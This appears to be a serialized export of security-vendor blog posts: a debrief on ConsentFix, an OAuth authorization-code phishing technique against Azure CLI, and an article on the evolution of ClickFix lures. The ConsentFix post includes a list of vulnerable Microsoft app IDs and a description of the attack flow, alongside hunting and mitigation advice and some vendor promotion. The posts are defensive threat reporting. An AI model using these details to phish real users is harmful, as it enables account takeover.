already logged in (which they likely are if working in their normal browser) their account information is already pre-populated and they won’t need to authenticate again. ",{"data":29706,"content":29707,"nodeType":879},{},[29708],{"data":29709,"marks":29710,"value":29711,"nodeType":883},{},[],"Selecting their account redirects them to a localhost URL containing an OAuth authorization code — this is what they then post into the original phishing page to complete the attack. ",{"data":29713,"content":29714,"nodeType":879},{},[29715],{"data":29716,"marks":29717,"value":29718,"nodeType":883},{},[],"Once the attacker gets the URL, they can exchange it for an access token or refresh token for the particular application being targeted — in this case, Azure CLI.",{"data":29720,"content":29721,"nodeType":879},{},[29722],{"data":29723,"marks":29724,"value":29725,"nodeType":883},{},[],"The TL;DR is that the attacker is manually completing an authorization flow that happens when a user logs into Azure CLI — a a command line client that provides you with the ability to easily manage your Azure AD \u002F Entra ID environment. Except in this case, they’re taking the victim’s information to log in on the attacker’s device instead. ",{"data":29727,"content":29731,"nodeType":971},{"target":29728},{"sys":29729},{"id":29730,"type":976,"linkType":977},"1eZOs7hXi9FzCE92QEP6xh",[],{"data":29733,"content":29734,"nodeType":1036},{},[29735],{"data":29736,"marks":29737,"value":29739,"nodeType":883},{},[29738],{"type":916},"Latest campaign details",{"data":29741,"content":29742,"nodeType":879},{},[29743],{"data":29744,"marks":29745,"value":29746,"nodeType":883},{},[],"Since we shared our blog post, we’ve had a number of additional details come to light about the campaign, which we’ve continued to track. ",{"data":29748,"content":29749,"nodeType":879},{},[29750,29754,29762],{"data":29751,"marks":29752,"value":29753,"nodeType":883},{},[],"It appears to be linked to Russian state-affiliated APT29, as corroborated by threat researchers we’ve been collaborating with. This is consistent with the ",{"data":29755,"content":29756,"nodeType":940},{"uri":1331},[29757],{"data":29758,"marks":29759,"value":29761,"nodeType":883},{},[29760],{"type":948},"stealthy tactics we observed",{"data":29763,"marks":29764,"value":29765,"nodeType":883},{},[],", which go far beyond the run-of-the-mill detection evasion techniques we see used in criminal phishing campaigns. ",{"data":29767,"content":29768,"nodeType":879},{},[29769,29773,29782],{"data":29770,"marks":29771,"value":29772,"nodeType":883},{},[],"It shares many similarities with, and appears to be an evolution of, ",{"data":29774,"content":29776,"nodeType":940},{"uri":29775},"https:\u002F\u002Fwww.volexity.com\u002Fblog\u002F2025\u002F12\u002F04\u002Fdangerous-invitations-russian-threat-actor-spoofs-european-security-events-in-targeted-phishing-attacks\u002F",[29777],{"data":29778,"marks":29779,"value":29781,"nodeType":883},{},[29780],{"type":948},"this Russia-affiliated campaign identified by Volexity",{"data":29783,"marks":29784,"value":29785,"nodeType":883},{},[]," that featured a manual version of the attack — where they victim was social engineered via email into opening the Microsoft URL, copying the localhost response, and sending it back to the attacker via email. ",{"data":29787,"content":29788,"nodeType":905},{},[],{"data":29790,"content":29791,"nodeType":909},{},[29792],{"data":29793,"marks":29794,"value":29796,"nodeType":883},{},[29795],{"type":916},"Top contributions from the community",{"data":29798,"content":29799,"nodeType":879},{},[29800],{"data":29801,"marks":29802,"value":29803,"nodeType":883},{},[],"As we mentioned earlier, the community response to ConsentFix has been incredible. ",{"data":29805,"content":29806,"nodeType":879},{},[29807],{"data":29808,"marks":29809,"value":29810,"nodeType":883},{},[],"As ever, you get a lot of vendors covering the attack technique with “install our product” as the recommendation. This is to be expected, but it’s misleading when some of these vendors are pushing EDR products that would have absolutely no way of detecting or blocking the attack. ",{"data":29812,"content":29813,"nodeType":879},{},[29814],{"data":29815,"marks":29816,"value":29817,"nodeType":883},{},[],"But cutting through the marketing, a lot of really great resources and recommendations were shared. ",{"data":29819,"content":29820,"nodeType":1036},{},[29821],{"data":29822,"marks":29823,"value":29825,"nodeType":883},{},[29824],{"type":916},"V2.0 released by John Hammond",{"data":29827,"content":29828,"nodeType":879},{},[29829,29833,29841],{"data":29830,"marks":29831,"value":29832,"nodeType":883},{},[],"Within days, John Hammond ",{"data":29834,"content":29835,"nodeType":940},{"uri":29488},[29836],{"data":29837,"marks":29838,"value":29840,"nodeType":883},{},[29839],{"type":948},"posted about ConsentFix on his Youtube channel",{"data":29842,"marks":29843,"value":29844,"nodeType":883},{},[],", where he showed off a slick improvement on the ConsentFix implementation used by attackers. In his version, the URL containing the Microsoft authorization code was generated in a pop-up browser window that could simply be drag-and-dropped into the phishing page. ",{"data":29846,"content":29847,"nodeType":879},{},[29848],{"data":29849,"marks":29850,"value":29851,"nodeType":883},{},[],"This implementation is way smoother, making it much more likely that a victim would fall for it. And this took a matter of days… ",{"data":29853,"content":29857,"nodeType":971},{"target":29854},{"sys":29855},{"id":29856,"type":976,"linkType":977},"59tfJDRhGThKD48Wjg7uY2",[],{"data":29859,"content":29860,"nodeType":1036},{},[29861],{"data":29862,"marks":29863,"value":29865,"nodeType":883},{},[29864],{"type":916},"Additional vulnerable first-party apps identified",{"data":29867,"content":29868,"nodeType":879},{},[29869,29873,29882],{"data":29870,"marks":29871,"value":29872,"nodeType":883},{},[],"Fabian Bader and Dirk-jan Mollema from Glueck Kanja have ",{"data":29874,"content":29876,"nodeType":940},{"uri":29875},"https:\u002F\u002Fentrascopes.com\u002F?bypass=true&authcodeFix=true",[29877],{"data":29878,"marks":29879,"value":29881,"nodeType":883},{},[29880],{"type":948},"shared a great resource",{"data":29883,"marks":29884,"value":29885,"nodeType":883},{},[]," on wider first-party apps that are vulnerable to ConsentFix. ",{"data":29887,"content":29888,"nodeType":879},{},[29889,29893,29902],{"data":29890,"marks":29891,"value":29892,"nodeType":883},{},[],"In total, there are 11 apps vulnerable to ConsentFix that also have known ",{"data":29894,"content":29896,"nodeType":940},{"uri":29895},"https:\u002F\u002Fcloudbrothers.info\u002Fconditional-access-bypasses\u002F#documented-bypasses",[29897],{"data":29898,"marks":29899,"value":29901,"nodeType":883},{},[29900],{"type":948},"Conditional Access exclusions",{"data":29903,"marks":29904,"value":29905,"nodeType":883},{},[]," (either for the app generally, or when specific scopes are requested for the app):",{"data":29907,"content":29908,"nodeType":1531},{},[29909,29919,29929,29939,29949,29959,29969,29979,29989,29999,30009],{"data":29910,"content":29911,"nodeType":1535},{},[29912],{"data":29913,"content":29914,"nodeType":879},{},[29915],{"data":29916,"marks":29917,"value":29918,"nodeType":883},{},[],"Microsoft Azure CLI: 04b07795-8ddb-461a-bbee-02f9e1bf7b46",{"data":29920,"content":29921,"nodeType":1535},{},[29922],{"data":29923,"content":29924,"nodeType":879},{},[29925],{"data":29926,"marks":29927,"value":29928,"nodeType":883},{},[],"Microsoft Azure PowerShell: 1950a258-227b-4e31-a9cf-717495945fc2",{"data":29930,"content":29931,"nodeType":1535},{},[29932],{"data":29933,"content":29934,"nodeType":879},{},[29935],{"data":29936,"marks":29937,"value":29938,"nodeType":883},{},[],"Microsoft Teams: 1fec8e78-bce4-4aaf-ab1b-5451cc387264",{"data":29940,"content":29941,"nodeType":1535},{},[29942],{"data":29943,"content":29944,"nodeType":879},{},[29945],{"data":29946,"marks":29947,"value":29948,"nodeType":883},{},[],"Microsoft Whiteboard Client: 57336123-6e14-4acc-8dcf-287b6088aa28",{"data":29950,"content":29951,"nodeType":1535},{},[29952],{"data":29953,"content":29954,"nodeType":879},{},[29955],{"data":29956,"marks":29957,"value":29958,"nodeType":883},{},[],"Microsoft Flow Mobile PROD-GCCH-CN: 57fcbcfa-7cee-4eb1-8b25-12d2030b4ee0",{"data":29960,"content":29961,"nodeType":1535},{},[29962],{"data":29963,"content":29964,"nodeType":879},{},[29965],{"data":29966,"marks":29967,"value":29968,"nodeType":883},{},[],"Enterprise Roaming and Backup: 60c8bde5-3167-4f92-8fdb-059f6176dc0",{"data":29970,"content":29971,"nodeType":1535},{},[29972],{"data":29973,"content":29974,"nodeType":879},{},[29975],{"data":29976,"marks":29977,"value":29978,"nodeType":883},{},[],"Visual Studio: 872cd9fa-d31f-45e0-9eab-6e460a02d1f1",{"data":29980,"content":29981,"nodeType":1535},{},[29982],{"data":29983,"content":29984,"nodeType":879},{},[29985],{"data":29986,"marks":29987,"value":29988,"nodeType":883},{},[],"Aadrm Admin Powershell: 90f610bf-206d-4950-b61d-37fa6fd1b224",{"data":29990,"content":29991,"nodeType":1535},{},[29992],{"data":29993,"content":29994,"nodeType":879},{},[29995],{"data":29996,"marks":29997,"value":29998,"nodeType":883},{},[],"Microsoft SharePoint Online Management Shell: 9bc3ab49-b65d-410a-85ad-de819febfddc",{"data":30000,"content":30001,"nodeType":1535},{},[30002],{"data":30003,"content":30004,"nodeType":879},{},[30005],{"data":30006,"marks":30007,"value":30008,"nodeType":883},{},[],"Microsoft Power Query for Excel: a672d62c-fc7b-4e81-a576-e60dc46e951d",{"data":30010,"content":30011,"nodeType":1535},{},[30012],{"data":30013,"content":30014,"nodeType":879},{},[30015],{"data":30016,"marks":30017,"value":30018,"nodeType":883},{},[],"Visual Studio Code: aebc6443-996d-45c2-90f0-388ff96faa56",{"data":30020,"content":30021,"nodeType":905},{},[],{"data":30023,"content":30024,"nodeType":909},{},[30025],{"data":30026,"marks":30027,"value":30029,"nodeType":883},{},[30028],{"type":916},"Predictions for ConsentFix",{"data":30031,"content":30032,"nodeType":879},{},[30033],{"data":30034,"marks":30035,"value":30036,"nodeType":883},{},[],"Based on the speed at which new iterations on the ConsentFix technique were shared by security researchers, and the breadth of apps and possible scopes that can be leveraged, both red teams and criminals will inevitably adopt ConsentFix into their arsenal of TTPs in the near future. It is likely that new ConsentFix variants will emerge imminently (if not already in circulation). ",{"data":30038,"content":30039,"nodeType":879},{},[30040],{"data":30041,"marks":30042,"value":30043,"nodeType":883},{},[],"All security teams responsible for protecting Microsoft environments should ensure that monitoring controls and mitigations are put in place as a matter of high priority. ",{"data":30045,"content":30046,"nodeType":905},{},[],{"data":30048,"content":30049,"nodeType":909},{},[30050],{"data":30051,"marks":30052,"value":30054,"nodeType":883},{},[30053],{"type":916},"Updated recommendations for security teams",{"data":30056,"content":30057,"nodeType":879},{},[30058],{"data":30059,"marks":30060,"value":30061,"nodeType":883},{},[],"As an entirely browser-native attack technique, many traditional security tools and data sources are of limited use when it comes to detecting or pre-emptively blocking this attack. At the same time, the attack exploits default Microsoft security configs to evade both prevention and detection controls.",{"data":30063,"content":30064,"nodeType":879},{},[30065],{"data":30066,"marks":30067,"value":30068,"nodeType":883},{},[],"To be able to tackle modern attacks like ConsentFix that occur entirely within the browser context, it is vital that organizations look to monitor the browser as a detection surface, hunt for signs of malicious activity, and block attacks in real-time — in the same way that you would expect EDR to work for endpoint attacks. ",{"data":30070,"content":30071,"nodeType":879},{},[30072],{"data":30073,"marks":30074,"value":30075,"nodeType":883},{},[],"For organizations relying on Microsoft logging as the sole line of defense against this attack, there are some new recommendations to add to the list thanks to the community response: ",{"data":30077,"content":30078,"nodeType":1531},{},[30079,30102,30112,30133],{"data":30080,"content":30081,"nodeType":1535},{},[30082],{"data":30083,"content":30084,"nodeType":879},{},[30085,30089,30098],{"data":30086,"marks":30087,"value":30088,"nodeType":883},{},[],"Ensure that logging for the deprecated ",{"data":30090,"content":30092,"nodeType":940},{"uri":30091},"https:\u002F\u002Flearn.microsoft.com\u002Fen-us\u002Fazure\u002Fazure-monitor\u002Freference\u002Ftables\u002Faadgraphactivitylogs",[30093],{"data":30094,"marks":30095,"value":30097,"nodeType":883},{},[30096],{"type":948},"AADGraphActivityLogs",{"data":30099,"marks":30100,"value":30101,"nodeType":883},{},[]," is enabled.",{"data":30103,"content":30104,"nodeType":1535},{},[30105],{"data":30106,"content":30107,"nodeType":879},{},[30108],{"data":30109,"marks":30110,"value":30111,"nodeType":883},{},[],"Hunt in logs for the Application IDs highlighted above, along with the Resource IDs for Windows Azure Active Directory (00000002-0000-0000-c000-000000000000) and Microsoft Intune Checkin (26a4ae64-5862-427f-a9b0-044e62572a4f)",{"data":30113,"content":30114,"nodeType":1535},{},[30115],{"data":30116,"content":30117,"nodeType":879},{},[30118,30121,30129],{"data":30119,"marks":30120,"value":21,"nodeType":883},{},[],{"data":30122,"content":30123,"nodeType":940},{"uri":29524},[30124],{"data":30125,"marks":30126,"value":30128,"nodeType":883},{},[30127],{"type":948},"Create Service Principals for each of the vulnerable apps and restrict the users that are authorized to access them",{"data":30130,"marks":30131,"value":30132,"nodeType":883},{},[]," to reduce the attack surface of users that can be phished with this method.",{"data":30134,"content":30135,"nodeType":1535},{},[30136],{"data":30137,"content":30138,"nodeType":879},{},[30139],{"data":30140,"marks":30141,"value":30142,"nodeType":883},{},[],"Block access to CLI tools via Conditional Access policy and issue exclusions for authorized users\u002Fgroups. ",{"data":30144,"content":30145,"nodeType":879},{},[30146,30150,30159,30163,30170],{"data":30147,"marks":30148,"value":30149,"nodeType":883},{},[],"Additional resources that may be of use include community-created ",{"data":30151,"content":30153,"nodeType":940},{"uri":30152},"https:\u002F\u002Fgithub.com\u002Felastic\u002Fdetection-rules\u002Fpull\u002F5485",[30154],{"data":30155,"marks":30156,"value":30158,"nodeType":883},{},[30157],{"type":948},"Elastic detection rules",{"data":30160,"marks":30161,"value":30162,"nodeType":883},{},[]," for ConsentFix and further mitigation and hunting guidance from ",{"data":30164,"content":30165,"nodeType":940},{"uri":29512},[30166],{"data":30167,"marks":30168,"value":29518,"nodeType":883},{},[30169],{"type":948},{"data":30171,"marks":30172,"value":3386,"nodeType":883},{},[],{"data":30174,"content":30175,"nodeType":905},{},[],{"data":30177,"content":30178,"nodeType":909},{},[30179],{"data":30180,"marks":30181,"value":30183,"nodeType":883},{},[30182],{"type":916},"Learn more about Push Security",{"data":30185,"content":30186,"nodeType":879},{},[30187],{"data":30188,"marks":30189,"value":30190,"nodeType":883},{},[],"Even though this was a brand new technique, Push intercepted this attack and shut it down before customers could interact with it. ",{"data":30192,"content":30193,"nodeType":879},{},[30194],{"data":30195,"marks":30196,"value":30197,"nodeType":883},{},[],"Push tackles browser-based attacks using behavioral threat detection controls, powered by deep browser telemetry, to provide broad detection and blocking capabilities against attacks happening in the browser. This means analyzing the end-to-end process of a webpage loading\u002Frunning in the browser, and how the user interacts with the page, to spot universal indicators of bad activity. ",{"data":30199,"content":30200,"nodeType":879},{},[30201],{"data":30202,"marks":30203,"value":30204,"nodeType":883},{},[],"This is the only reliable way to detect malicious websites in a world where IoC-based detections are trivial for attackers to get around. Rather than playing known-bad whac-a-mole, Push detects and blocks even zero-day browser threats in real time.",{"data":30206,"content":30207,"nodeType":879},{},[30208],{"data":30209,"marks":30210,"value":30211,"nodeType":883},{},[],"Push stops browser-based attacks like AiTM phishing, credential stuffing, malicious browser extensions, ClickFix, ConsentFix, and session hijacking. You don’t need to wait until it all goes wrong either — you can also use Push to proactively find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, and more to harden your identity attack surface.",{"data":30213,"content":30214,"nodeType":879},{},[30215,30218,30225,30228,30235],{"data":30216,"marks":30217,"value":16267,"nodeType":883},{},[],{"data":30219,"content":30220,"nodeType":940},{"uri":10222},[30221],{"data":30222,"marks":30223,"value":10228,"nodeType":883},{},[30224],{"type":948},{"data":30226,"marks":30227,"value":26256,"nodeType":883},{},[],{"data":30229,"content":30230,"nodeType":940},{"uri":4772},[30231],{"data":30232,"marks":30233,"value":1751,"nodeType":883},{},[30234],{"type":948},{"data":30236,"marks":30237,"value":1350,"nodeType":883},{},[],{"data":30239,"content":30243,"nodeType":971},{"target":30240},{"sys":30241},{"id":30242,"type":976,"linkType":977},"4D7zpYAc1tTEAmn2hpkWPe",[],{"data":30245,"content":30246,"nodeType":879},{},[30247],{"data":30248,"marks":30249,"value":21,"nodeType":883},{},[],"ConsentFix debrief: latest community insights, recommendations, and predictions","New insights on the ConsentFix campaign stopped by Push.","2026-01-14T00:00:00.000Z","consentfix-debrief",{"items":30255},[30256,30258],{"sys":30257,"name":343},{"id":3276},{"sys":30259,"name":3273},{"id":3272},{"items":30261},[30262],{"fullName":866,"firstName":867,"jobTitle":868,"profilePicture":30263},{"url":872},{"__typename":1967,"sys":30265,"content":30267,"title":30843,"synopsis":30844,"hashTags":59,"publishedDate":30845,"slug":30846,"tagsCollection":30847,"authorsCollection":30853},{"id":30266},"7rVNBW6rYXnXMpI0JEwzgR",{"json":30268},{"data":30269,"content":30270,"nodeType":875},{},[30271,30278,30285,30297,30303,30310,30313,30321,30328,30334,30350,30357,30380,30387,30393,30396,30404,30437,30443,30462,30468,30487,30494,30500,30503,30511,30518,30538,30545,30565,30572,30578,30581,30589,30596,30629,30636,30643,30689,30708,30718,30725,30728,30736,30756,30763,30770,30776,30779,30786,30806,30832,30837],{"data":30272,"content":30273,"nodeType":879},{},[30274],{"data":30275,"marks":30276,"value":30277,"nodeType":883},{},[],"ClickFix attacks have skyrocketed in the last year. This social engineering attack has established itself as a key part of the modern attacker’s toolkit, tricking victims into running malicious code on their device.",{"data":30279,"content":30280,"nodeType":879},{},[30281],{"data":30282,"marks":30283,"value":30284,"nodeType":883},{},[],"As we showcased in our last webinar and at our threat briefing in London earlier this month, ClickFix is evolving fast, in terms of the web pages themselves, the delivery mechanisms by which they are sent to victims, and the nature of the payload and its execution.",{"data":30286,"content":30287,"nodeType":879},{},[30288,30292],{"data":30289,"marks":30290,"value":30291,"nodeType":883},{},[],"One particular example stood out to us in our research. ",{"data":30293,"marks":30294,"value":30296,"nodeType":883},{},[30295],{"type":916},"So, is this the most advanced ClickFix you’ve seen?",{"data":30298,"content":30302,"nodeType":971},{"target":30299},{"sys":30300},{"id":30301,"type":976,"linkType":977},"ID7VKJNOZk729P5zBOBjZ",[],{"data":30304,"content":30305,"nodeType":879},{},[30306],{"data":30307,"marks":30308,"value":30309,"nodeType":883},{},[],"Let’s break it down further.",{"data":30311,"content":30312,"nodeType":905},{},[],{"data":30314,"content":30315,"nodeType":909},{},[30316],{"data":30317,"marks":30318,"value":30320,"nodeType":883},{},[30319],{"type":916},"How ClickFix pages are evolving",{"data":30322,"content":30323,"nodeType":879},{},[30324],{"data":30325,"marks":30326,"value":30327,"nodeType":883},{},[],"The CloudFlare-based lure is a great example of how ClickFix pages themselves are evolving — and becoming increasingly convincing to users. ",{"data":30329,"content":30333,"nodeType":971},{"target":30330},{"sys":30331},{"id":30332,"type":976,"linkType":977},"4wJOgtofImjbsekyXMc5Ec",[],{"data":30335,"content":30336,"nodeType":879},{},[30337,30341,30346],{"data":30338,"marks":30339,"value":30340,"nodeType":883},{},[],"This is an incredibly slick example — ",{"data":30342,"marks":30343,"value":30345,"nodeType":883},{},[30344],{"type":916},"it almost looks like Cloudflare shipped a new kind of bot check service. ",{"data":30347,"marks":30348,"value":30349,"nodeType":883},{},[],"The embedded video, countdown timer, and counter for “users verified in the last hour” all serve to increase the sense of authenticity, and put extra pressure on the victim to complete the check. ",{"data":30351,"content":30352,"nodeType":879},{},[30353],{"data":30354,"marks":30355,"value":30356,"nodeType":883},{},[],"There are a couple of extra things happening under the hood here, too:",{"data":30358,"content":30359,"nodeType":1531},{},[30360,30370],{"data":30361,"content":30362,"nodeType":1535},{},[30363],{"data":30364,"content":30365,"nodeType":879},{},[30366],{"data":30367,"marks":30368,"value":30369,"nodeType":883},{},[],"The page is adapting to the device that you’re visiting from, serving up instructions specific to the user’s Mac (increasingly common as ClickFix expands to support different Operating Systems).",{"data":30371,"content":30372,"nodeType":1535},{},[30373],{"data":30374,"content":30375,"nodeType":879},{},[30376],{"data":30377,"marks":30378,"value":30379,"nodeType":883},{},[],"The page is automatically copying the malicious code to the user’s clipboard via JavaScript (which we see in 9\u002F10 cases).",{"data":30381,"content":30382,"nodeType":879},{},[30383],{"data":30384,"marks":30385,"value":30386,"nodeType":883},{},[],"For the past decade or more, user awareness has focused on stopping users from clicking links in suspicious emails, downloading risky files, and entering their username and password into random websites. It hasn’t focused on opening up a program and running a command — so it’s no surprise that this kind of highly convincing page is so effective at duping victims into following the instructions. ",{"data":30388,"content":30392,"nodeType":971},{"target":30389},{"sys":30390},{"id":30391,"type":976,"linkType":977},"LiVIyGxdAaUXUfvKjD6ON",[],{"data":30394,"content":30395,"nodeType":905},{},[],{"data":30397,"content":30398,"nodeType":909},{},[30399],{"data":30400,"marks":30401,"value":30403,"nodeType":883},{},[30402],{"type":916},"How ClickFix delivery methods are evolving",{"data":30405,"content":30406,"nodeType":879},{},[30407,30411,30420,30424,30433],{"data":30408,"marks":30409,"value":30410,"nodeType":883},{},[],"There’s also the fact that this page wasn’t accessed via email. The top delivery vector for ClickFix attacks that we’ve observed is, in fact, Google Search — in the form of ",{"data":30412,"content":30414,"nodeType":940},{"uri":30413},"https:\u002F\u002Fphishing-techniques.pushsecurity.com\u002Ftechniques\u002Fmalvertising\u002F",[30415],{"data":30416,"marks":30417,"value":30419,"nodeType":883},{},[30418],{"type":948},"poisoned search results and malicious advertising (malvertising)",{"data":30421,"marks":30422,"value":30423,"nodeType":883},{},[],". Attackers are either taking over legitimate sites (there’s a ",{"data":30425,"content":30427,"nodeType":940},{"uri":30426},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fhackers-launch-mass-attacks-exploiting-outdated-wordpress-plugins\u002F",[30428],{"data":30429,"marks":30430,"value":30432,"nodeType":883},{},[30431],{"type":948},"steady supply of website hosting and CMS vulnerabilities",{"data":30434,"marks":30435,"value":30436,"nodeType":883},{},[]," to take advantage of) or simply vibe-coding their own sites and optimizing them for various search terms. ",{"data":30438,"content":30442,"nodeType":971},{"target":30439},{"sys":30440},{"id":30441,"type":976,"linkType":977},"6N9EmH6AaN6Hr4xk6ozATR",[],{"data":30444,"content":30445,"nodeType":879},{},[30446,30450,30459],{"data":30447,"marks":30448,"value":30449,"nodeType":883},{},[],"And because most anti-phishing controls are implemented via email, by using ",{"data":30451,"content":30453,"nodeType":940},{"uri":30452},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fwhy-attackers-are-moving-beyond-email-based-phishing?utm_source=thehackernews&utm_medium=sponsored-content&utm_term=article",[30454],{"data":30455,"marks":30456,"value":30458,"nodeType":883},{},[30457],{"type":948},"non-email delivery vectors, an entire layer of detection opportunity is cut out",{"data":30460,"marks":30461,"value":3386,"nodeType":883},{},[],{"data":30463,"content":30467,"nodeType":971},{"target":30464},{"sys":30465},{"id":30466,"type":976,"linkType":977},"1CWsZlLFX9TS53J1uamOG8",[],{"data":30469,"content":30470,"nodeType":879},{},[30471,30475,30483],{"data":30472,"marks":30473,"value":30474,"nodeType":883},{},[],"But even when they are sent via email, ClickFix pages, like other modern phishing sites, are using a range of ",{"data":30476,"content":30478,"nodeType":940},{"uri":30477},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fphishing-detection-evasion-launch?utm_source=thehackernews&utm_medium=sponsored-content&utm_term=article",[30479],{"data":30480,"marks":30481,"value":13764,"nodeType":883},{},[30482],{"type":948},{"data":30484,"marks":30485,"value":30486,"nodeType":883},{},[]," that prevent them being flagged by security tools — from email scanners, to web-crawling security tools, to web proxies analyzing network traffic. Detection evasion mainly involves camouflaging and rotating domains to stay ahead of known-bad detections (i.e. blocklists), using bot protection to prevent analysis, and heavily obfuscating page content to stop detection signatures firing. ",{"data":30488,"content":30489,"nodeType":879},{},[30490],{"data":30491,"marks":30492,"value":30493,"nodeType":883},{},[],"Finally, because the code is copied inside the browser sandbox, typical security tools are unable to observe and flag this action as potentially malicious. This means that the last — and only — opportunity for organizations to stop ClickFix is on the endpoint, after the user has attempted to run the malicious code.",{"data":30495,"content":30499,"nodeType":971},{"target":30496},{"sys":30497},{"id":30498,"type":976,"linkType":977},"3HiqpIBWWMr5FMi3IBzXcc",[],{"data":30501,"content":30502,"nodeType":905},{},[],{"data":30504,"content":30505,"nodeType":909},{},[30506],{"data":30507,"marks":30508,"value":30510,"nodeType":883},{},[30509],{"type":916},"How ClickFix payloads are evolving",{"data":30512,"content":30513,"nodeType":879},{},[30514],{"data":30515,"marks":30516,"value":30517,"nodeType":883},{},[],"It’s not just the ClickFix page and delivery mechanisms that are evolving — the services where code is being run, and the type of payload, are also increasingly varied. ",{"data":30519,"content":30520,"nodeType":879},{},[30521,30525,30534],{"data":30522,"marks":30523,"value":30524,"nodeType":883},{},[],"While the main payloads observed by Push are mshta and PowerShell, ",{"data":30526,"content":30528,"nodeType":940},{"uri":30527},"https:\u002F\u002Fmhaggis.github.io\u002FClickGrab\u002Ftechniques.html",[30529],{"data":30530,"marks":30531,"value":30533,"nodeType":883},{},[30532],{"type":948},"attackers are abusing a wide range of LOLBINS",{"data":30535,"marks":30536,"value":30537,"nodeType":883},{},[]," targeting different services across Operating Systems.",{"data":30539,"content":30540,"nodeType":879},{},[30541],{"data":30542,"marks":30543,"value":30544,"nodeType":883},{},[],"While it is possible to disable the Win+R dialog box and limit the applications that can be run from the File Explorer address bar, it is not possible to similarly restrict users from interacting with other legitimate services to run malicious commands. ",{"data":30546,"content":30547,"nodeType":879},{},[30548,30552,30561],{"data":30549,"marks":30550,"value":30551,"nodeType":883},{},[],"Another recent example termed ",{"data":30553,"content":30555,"nodeType":940},{"uri":30554},"https:\u002F\u002Fexpel.com\u002Fblog\u002Fcache-smuggling-when-a-picture-isnt-a-thousand-words\u002F",[30556],{"data":30557,"marks":30558,"value":30560,"nodeType":883},{},[30559],{"type":948},"cache smuggling",{"data":30562,"marks":30563,"value":30564,"nodeType":883},{},[]," was also identified by security researchers. This technique combines a ClickFix approach with JavaScript that caches a malicious file posing as a JPG. This means that the ClickFix command executes locally — effectively getting an entire zip file onto the local system without the PowerShell command needing to make any web requests.",{"data":30566,"content":30567,"nodeType":879},{},[30568],{"data":30569,"marks":30570,"value":30571,"nodeType":883},{},[],"Finally, it’s worth considering the future of ClickFix. The current attack path straddles browser and endpoint — what if it could take place entirely in the browser and evade EDR altogether? ",{"data":30573,"content":30577,"nodeType":971},{"target":30574},{"sys":30575},{"id":30576,"type":976,"linkType":977},"2rUDKawJnrmZVtxfNcSNha",[],{"data":30579,"content":30580,"nodeType":905},{},[],{"data":30582,"content":30583,"nodeType":909},{},[30584],{"data":30585,"marks":30586,"value":30588,"nodeType":883},{},[30587],{"type":916},"What’s the impact of ClickFix evolution?",{"data":30590,"content":30591,"nodeType":879},{},[30592],{"data":30593,"marks":30594,"value":30595,"nodeType":883},{},[],"To summarize:",{"data":30597,"content":30598,"nodeType":1531},{},[30599,30609,30619],{"data":30600,"content":30601,"nodeType":1535},{},[30602],{"data":30603,"content":30604,"nodeType":879},{},[30605],{"data":30606,"marks":30607,"value":30608,"nodeType":883},{},[],"ClickFix pages are becoming increasingly sophisticated, making it more likely that victims will fall for the social engineering.",{"data":30610,"content":30611,"nodeType":1535},{},[30612],{"data":30613,"content":30614,"nodeType":879},{},[30615],{"data":30616,"marks":30617,"value":30618,"nodeType":883},{},[],"ClickFix delivery is evading traditional monitoring controls at the email layer to reach victims. ",{"data":30620,"content":30621,"nodeType":1535},{},[30622],{"data":30623,"content":30624,"nodeType":879},{},[30625],{"data":30626,"marks":30627,"value":30628,"nodeType":883},{},[],"ClickFix payloads are becoming more varied and are finding new ways to evade security controls. ",{"data":30630,"content":30631,"nodeType":879},{},[30632],{"data":30633,"marks":30634,"value":30635,"nodeType":883},{},[],"This means that EDR-based interception of malware execution is the last — and only — real line of defense for most organizations, kicking in after the initial script has been run (typically acting as a stager for the real malware). ",{"data":30637,"content":30638,"nodeType":879},{},[30639],{"data":30640,"marks":30641,"value":30642,"nodeType":883},{},[],"Malware execution can and should be intercepted by EDR, but it’s not foolproof. ",{"data":30644,"content":30645,"nodeType":1531},{},[30646,30669,30679],{"data":30647,"content":30648,"nodeType":1535},{},[30649],{"data":30650,"content":30651,"nodeType":879},{},[30652,30656,30665],{"data":30653,"marks":30654,"value":30655,"nodeType":883},{},[],"Attackers are constantly ",{"data":30657,"content":30659,"nodeType":940},{"uri":30658},"https:\u002F\u002Fwww.infostealers.com\u002Farticle\u002Flogins-zip-leverages-chromium-zero-day-stealthy-infostealer-builder-promises-99-credential-theft-in-under-12-seconds\u002F",[30660],{"data":30661,"marks":30662,"value":30664,"nodeType":883},{},[30663],{"type":948},"developing new tools and capabilities",{"data":30666,"marks":30667,"value":30668,"nodeType":883},{},[]," to bypass EDR in the cat-and-mouse game between attackers and defenders.",{"data":30670,"content":30671,"nodeType":1535},{},[30672],{"data":30673,"content":30674,"nodeType":879},{},[30675],{"data":30676,"marks":30677,"value":30678,"nodeType":883},{},[],"Because ClickFix attacks are user initiated, context might be missing that lead to the alert being misclassified. This can mean the difference between the level of priority alert that is raised, and whether or not it is automatically blocked.",{"data":30680,"content":30681,"nodeType":1535},{},[30682],{"data":30683,"content":30684,"nodeType":879},{},[30685],{"data":30686,"marks":30687,"value":30688,"nodeType":883},{},[],"If you’re an organization that allows employees and contractors to use unmanaged BYOD devices, there’s a strong chance that there are gaps in your EDR coverage.",{"data":30690,"content":30691,"nodeType":879},{},[30692,30696,30704],{"data":30693,"marks":30694,"value":30695,"nodeType":883},{},[],"This is why attackers are doubling down. According to the ",{"data":30697,"content":30699,"nodeType":940},{"uri":30698},"https:\u002F\u002Fcdn-dynmedia-1.microsoft.com\u002Fis\u002Fcontent\u002Fmicrosoftcorp\u002Fmicrosoft\u002Fmsc\u002Fdocuments\u002Fpresentations\u002FCSR\u002FMicrosoft-Digital-Defense-Report-2025.pdf#page=1",[30700],{"data":30701,"marks":30702,"value":30703,"nodeType":883},{},[],"2025 Microsoft Digital Defense report",{"data":30705,"marks":30706,"value":30707,"nodeType":883},{},[],", ClickFix was the most common initial access method in the last year, accounting for 47% of attacks. That's a pretty significant stat.",{"data":30709,"content":30710,"nodeType":4197},{},[30711],{"data":30712,"content":30713,"nodeType":879},{},[30714],{"data":30715,"marks":30716,"value":30717,"nodeType":883},{},[],"47% of attacks started with ClickFix in the last year, according to Microsoft.",{"data":30719,"content":30720,"nodeType":879},{},[30721],{"data":30722,"marks":30723,"value":30724,"nodeType":883},{},[],"Ultimately, 